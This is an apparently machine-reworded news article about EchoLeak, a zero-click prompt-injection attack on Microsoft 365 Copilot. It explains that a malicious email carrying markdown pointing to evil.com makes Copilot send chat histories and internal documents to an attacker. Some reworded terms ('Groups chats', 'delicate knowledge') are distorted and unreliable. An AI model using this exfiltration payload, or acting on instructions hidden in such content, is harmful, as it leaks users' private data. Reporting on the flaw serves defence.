Wednesday, June 18, 2025
HomeTechnologyFirst-ever zero-click assault targets Microsoft 365 Copilot

First-ever zero-click assault targets Microsoft 365 Copilot

-



“That is sheer weaponization of AI’s core power, contextual understanding, towards itself,” stated Abhishek Anant Garg, an analyst at QKS Group. “Enterprise safety struggles as a result of it’s constructed for malicious code, not language that appears innocent however acts like a weapon.”

This sort of vulnerability represents a big risk, warned Nader Henein, VP Analyst at Gartner. “Given the complexity of AI assistants and RAG-based providers, it’s undoubtedly not the final we’ll see.”

EchoLeak’s exploit mechanism

EchoLeak exploits Copilot’s skill to deal with each trusted inner knowledge (like emails, Groups chats, and OneDrive recordsdata) and untrusted exterior inputs, similar to inbound emails. The assault begins with a malicious e mail containing particular markdown syntax, “like ![Image alt text][ref] [ref]: https://www.evil.com?param=.” When Copilot routinely scans the e-mail within the background to organize for person queries, it triggers a browser request that sends delicate knowledge, similar to chat histories, person particulars, or inner paperwork, to an attacker’s server.

Related articles

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Stay Connected

0FansLike
0FollowersFollow
0FollowersFollow
0SubscribersSubscribe

Latest posts